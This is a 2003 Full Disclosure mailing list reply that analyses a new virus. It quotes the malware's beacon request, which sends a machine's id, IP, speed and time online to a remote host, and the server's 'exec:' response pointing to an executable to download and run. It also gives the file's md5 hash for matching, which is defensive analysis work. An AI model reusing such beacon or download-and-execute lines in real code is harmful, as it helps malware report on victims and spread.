Full Disclosure mailing list archives
Re: New virus
From: Steven Harrison <security () smharr4 dnsalias net>
Date: Tue, 25 Nov 2003 14:17:07 -0800
On Tue, 25 Nov 2003, Lorenzo Hernandez Garcia-Hierro wrote:
Hi, Look this line: GET /events.php?%s HTTP/1.1 Accept: */* Connection: Keep-Alive Host: finance.red-host.com id=%s&ip=%s&speed=%d&timeonline=%d finance.red-host.com so imagine this: id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection speed]&timeonline=[seconds/minutes]
Just for fun, I pointed my web browser at http://finance.red-host.com/events.php and all I got back was: exec:http://wendy35.phpwebhosting.com/netm.exe I retrieved that file, and running it 'strings' does imply that it will contact a remote website. It could be a copy of the virus (I have yet to recieve one yet), giving it another way to distribute itself, or for the author to distribute improved versions. Looking at the website at http://finance.red-host.com gives: This account has been suspected by red-host.com administration. The md5sum of that downloaded file is: a930c6cb48b7bd66af7069c8ef90882f netm.exe in case anyone wants to try and match it up with the files they have. -- Steven Harrison Unix Systems Administrator N Statement lost, 0:1 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- New virus Andrew Thomas (Nov 25)
- Re: New virus Alain Fauconnet (Nov 25)
- <Possible follow-ups>
- New virus Andrew Thomas (Nov 25)
- Re: New virus Lorenzo Hernandez Garcia-Hierro (Nov 25)
- Re: New virus Steven Harrison (Nov 25)
- Re: New virus Joe Stewart (Nov 26)
- Re: New virus Lorenzo Hernandez Garcia-Hierro (Nov 25)
- RE: New virus Kristian Hermansen (Nov 25)